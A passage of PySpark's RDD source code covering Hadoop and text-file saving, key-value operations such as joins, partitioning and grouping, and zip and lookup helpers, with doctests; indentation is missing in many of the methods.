jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
    @ignore_unicode_prefix
    def saveAsTextFile(self, path, compressionCodecClass=None):
        """
        Save this RDD as a text file, using string representations of elements.
        @param path: path to text file
        @param compressionCodecClass: (None by default) string i.e.
            "org.apache.hadoop.io.compress.GzipCodec"
        >>> tempFile = NamedTemporaryFile(delete=True)
        >>> tempFile.close()
        >>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
        >>> from fileinput import input
        >>> from glob import glob
        >>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
        '0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
        Empty lines are tolerated when saving to text files.
        >>> tempFile2 = NamedTemporaryFile(delete=True)
        >>> tempFile2.close()
        >>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
        >>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
        '\\n\\n\\nbar\\nfoo\\n'
        Using compressionCodecClass
        >>> tempFile3 = NamedTemporaryFile(delete=True)
        >>> tempFile3.close()
        >>> codec = "org.apache.hadoop.io.compress.GzipCodec"
        >>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
        >>> from fileinput import input, hook_compressed
        >>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
        >>> b''.join(result).decode('utf-8')
        u'bar\\nfoo\\n'
        """
        # Stringify every element and encode it to UTF-8 bytes before the
        # partition is handed to the JVM writer (`unicode` is the py2/py3
        # compatibility alias used throughout this module).
        def func(split, iterator):
            for x in iterator:
                if not isinstance(x, (unicode, bytes)):
                    x = unicode(x)
                if isinstance(x, unicode):
                    x = x.encode("utf-8")
                yield x
        keyed = self.mapPartitionsWithIndex(func)
        # Bypass Python-side serialization: the elements are already raw
        # bytes, which the JVM converts back to strings for writing.
        keyed._bypass_serializer = True
        if compressionCodecClass:
            compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
            keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
        else:
            keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
    def fullOuterJoin(self, other, numPartitions=None):
        """
        Perform a full outer join of C{self} and C{other}.
        For each element (k, v) in C{self}, the resulting RDD will either
        contain all pairs (k, (v, w)) for w in C{other}, or the pair
        (k, (v, None)) if no elements in C{other} have key k.
        Similarly, for each element (k, w) in C{other}, the resulting RDD will
        either contain all pairs (k, (v, w)) for v in C{self}, or the pair
        (k, (None, w)) if no elements in C{self} have key k.
        Hash-partitions the resulting RDD into the given number of partitions.
        >>> x = sc.parallelize([("a", 1), ("b", 4)])
        >>> y = sc.parallelize([("a", 2), ("c", 8)])
        >>> sorted(x.fullOuterJoin(y).collect())
        [('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
        """
        return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
    # portable_hash is used as the default because the builtin hash of None
    # differs across machines.
    def partitionBy(self, numPartitions, partitionFunc=portable_hash):
        """
        Return a copy of the RDD partitioned using the specified partitioner.
        >>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
        >>> sets = pairs.partitionBy(2).glom().collect()
        >>> len(set(sets[0]).intersection(set(sets[1])))
        0
        """
        if numPartitions is None:
            numPartitions = self._defaultReducePartitions()
        partitioner = Partitioner(numPartitions, partitionFunc)
        # Already partitioned the same way: nothing to do.
        if self.partitioner == partitioner:
            return self
        # Transferring O(n) objects to Java is too expensive.
        # Instead, we'll form the hash buckets in Python,
        # transferring O(numPartitions) objects to Java.
        # Each object is a (splitNumber, [objects]) pair.
        # In order to avoid too huge objects, the objects are
        # grouped into chunks.
        outputSerializer = self.ctx._unbatched_serializer
        # Soft memory cap: half the configured Python worker memory.
        limit = (_parse_memory(self.ctx._conf.get(
            "spark.python.worker.memory", "512m")) / 2)
        def add_shuffle_key(split, iterator):
            # Emits an alternating stream of pack_long(partition id) and the
            # serialized chunk of (k, v) pairs destined for that partition.
            buckets = defaultdict(list)
            c, batch = 0, min(10 * numPartitions, 1000)
            for k, v in iterator:
                buckets[partitionFunc(k) % numPartitions].append((k, v))
                c += 1
                # check used memory and avg size of chunk of objects
                if (c % 1000 == 0 and get_used_memory() > limit
                        or c > batch):
                    n, size = len(buckets), 0
                    # NOTE(review): this loop variable shadows the `split`
                    # parameter, which is unused afterwards, so it is
                    # harmless — but confusing.
                    for split in list(buckets.keys()):
                        yield pack_long(split)
                        d = outputSerializer.dumps(buckets[split])
                        del buckets[split]
                        yield d
                        size += len(d)
                    avg = int(size / n) >> 20
                    # let 1M < avg < 10M
                    if avg < 1:
                        batch *= 1.5
                    elif avg > 10:
                        batch = max(int(batch / 1.5), 1)
                    c = 0
            # Flush whatever remains after the input is exhausted.
            for split, items in buckets.items():
                yield pack_long(split)
                yield outputSerializer.dumps(items)
        keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
        # The stream is raw bytes; skip Python-side serialization.
        keyed._bypass_serializer = True
        with SCCallSiteSync(self.context) as css:
            pairRDD = self.ctx._jvm.PairwiseRDD(
                keyed._jrdd.rdd()).asJavaPairRDD()
            jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
                                                           id(partitionFunc))
        jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
        rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
        # Remember the partitioner so a repeated partitionBy with the same
        # function/partition count can short-circuit above.
        rdd.partitioner = partitioner
        return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
    # TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
    """
    Zips this RDD with another one, returning key-value pairs with the
    first element in each RDD, second element in each RDD, etc. Assumes
    that the two RDDs have the same number of partitions and the same
    number of elements in each partition (e.g. one was made through
    a map on the other).

    >>> x = sc.parallelize(range(0,5))
    >>> y = sc.parallelize(range(1000, 1005))
    >>> x.zip(y).collect()
    [(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
    """
    def get_batch_size(ser):
        # only BatchedSerializer carries an explicit batch size
        if isinstance(ser, BatchedSerializer):
            return ser.batchSize
        return 1  # not batched

    def batch_as(rdd, batchSize):
        # force both sides onto the same fixed pickle batch size
        return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))

    my_batch = get_batch_size(self._jrdd_deserializer)
    other_batch = get_batch_size(other._jrdd_deserializer)
    if my_batch != other_batch or not my_batch:
        # use the smallest batchSize for both of them
        batchSize = min(my_batch, other_batch)
        if batchSize <= 0:
            # auto batched or unlimited
            batchSize = 100
        other = batch_as(other, batchSize)
        self = batch_as(self, batchSize)

    if self.getNumPartitions() != other.getNumPartitions():
        raise ValueError("Can only zip with RDD which has the same number of partitions")

    # There will be an Exception in JVM if there are different number
    # of items in each partitions.
    pairRDD = self._jrdd.zip(other._jrdd)
    deserializer = PairDeserializer(self._jrdd_deserializer,
                                    other._jrdd_deserializer)
    return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
    """
    Zips this RDD with its element indices.

    The ordering is first based on the partition index and then the
    ordering of items within each partition. So the first item in
    the first partition gets index 0, and the last item in the last
    partition receives the largest index.

    This method needs to trigger a spark job when this RDD contains
    more than one partitions.

    >>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
    [('a', 0), ('b', 1), ('c', 2), ('d', 3)]
    """
    # starts[k] = index assigned to the first element of partition k;
    # computing it needs the size of every earlier partition, hence a job
    starts = [0]
    if self.getNumPartitions() > 1:
        sizes = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
        for size in sizes[:-1]:
            starts.append(starts[-1] + size)

    def assign(split, iterator):
        return ((v, i) for i, v in enumerate(iterator, starts[split]))

    return self.mapPartitionsWithIndex(assign)
def zipWithUniqueId(self):
    """
    Zips this RDD with generated unique Long ids.

    Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
    n is the number of partitions. So there may exist gaps, but this
    method won't trigger a spark job, which is different from
    L{zipWithIndex}

    >>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
    [('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
    """
    num_partitions = self.getNumPartitions()

    def assign(split, iterator):
        # id of the j-th item in partition `split` is j * n + split
        return ((item, pos * num_partitions + split)
                for pos, item in enumerate(iterator))

    return self.mapPartitionsWithIndex(assign)
def name(self):
    """
    Return the name of this RDD, or None if no name was assigned.
    """
    # the JVM side returns an empty/None value for unnamed RDDs;
    # normalize both to None
    rdd_name = self._jrdd.name()
    return rdd_name if rdd_name else None
@ignore_unicode_prefix
def setName(self, name):
    """
    Assign a name to this RDD.

    >>> rdd1 = sc.parallelize([1, 2])
    >>> rdd1.setName('RDD1').name()
    u'RDD1'
    """
    # name is stored on the JVM-side RDD; return self to allow chaining
    self._jrdd.setName(name)
    return self
def toDebugString(self):
    """
    A description of this RDD and its recursive dependencies for debugging.

    Returns the description as UTF-8 encoded bytes, or None if the JVM
    returned nothing.
    """
    info = self._jrdd.toDebugString()
    return info.encode('utf-8') if info else None
def getStorageLevel(self):
    """
    Get the RDD's current storage level.

    >>> rdd1 = sc.parallelize([1,2])
    >>> rdd1.getStorageLevel()
    StorageLevel(False, False, False, False, 1)
    >>> print(rdd1.getStorageLevel())
    Serialized 1x Replicated
    """
    # translate the JVM-side StorageLevel into the Python wrapper object
    java_storage_level = self._jrdd.getStorageLevel()
    storage_level = StorageLevel(java_storage_level.useDisk(),
                                 java_storage_level.useMemory(),
                                 java_storage_level.useOffHeap(),
                                 java_storage_level.deserialized(),
                                 java_storage_level.replication())
    return storage_level
def _defaultReducePartitions(self):
    """
    Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
    If spark.default.parallelism is set, then we'll use the value from SparkContext
    defaultParallelism, otherwise we'll use the number of partitions in this RDD.

    This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
    the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
    be inherent.
    """
    # guard clause: fall back to this RDD's own partition count
    if not self.ctx._conf.contains("spark.default.parallelism"):
        return self.getNumPartitions()
    return self.ctx.defaultParallelism
def lookup(self, key):
    """
    Return the list of values in the RDD for key `key`. This operation
    is done efficiently if the RDD has a known partitioner by only
    searching the partition that the key maps to.

    >>> l = range(1000)
    >>> rdd = sc.parallelize(zip(l, l), 10)
    >>> rdd.lookup(42)  # slow
    [42]
    >>> sorted = rdd.sortByKey()
    >>> sorted.lookup(42)  # fast
    [42]
    >>> sorted.lookup(1024)
    []
    >>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
    >>> list(rdd2.lookup(('a', 'b'))[0])
    ['c']
    """
    values = self.filter(lambda kv: kv[0] == key).values()

    if self.partitioner is not None:
        # fast path: run a job only on the single partition the key maps to
        return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])

    # slow path: scan every partition
    return values.collect()
def _to_java_object_rdd(self):
    """ Return a JavaRDD of Object by unpickling

    It will convert each Python object into Java object by Pyrolite, whenever the
    RDD is serialized in batch or not.
    """
    # ensure pickle serialization, then let Pyrolite unpickle JVM-side
    pickled = self._pickled()
    return self.ctx._jvm.SerDeUtil.pythonToJava(pickled._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
    """
    .. note:: Experimental

    Approximate version of count() that returns a potentially incomplete
    result within a timeout, even if not all tasks have finished.

    >>> rdd = sc.parallelize(range(1000), 10)
    >>> rdd.countApprox(1000, 1.0)
    1000
    """
    # count each partition as a float so we can reuse sumApprox
    per_partition_counts = self.mapPartitions(
        lambda part: [float(sum(1 for _ in part))])
    return int(per_partition_counts.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
    """
    .. note:: Experimental

    Approximate operation to return the sum within a timeout
    or meet the confidence.

    >>> rdd = sc.parallelize(range(1000), 10)
    >>> r = sum(range(1000))
    >>> abs(rdd.sumApprox(1000) - r) / r < 0.05
    True
    """
    # pre-sum each partition in Python, then delegate the approximate
    # aggregation to the JVM's JavaDoubleRDD implementation
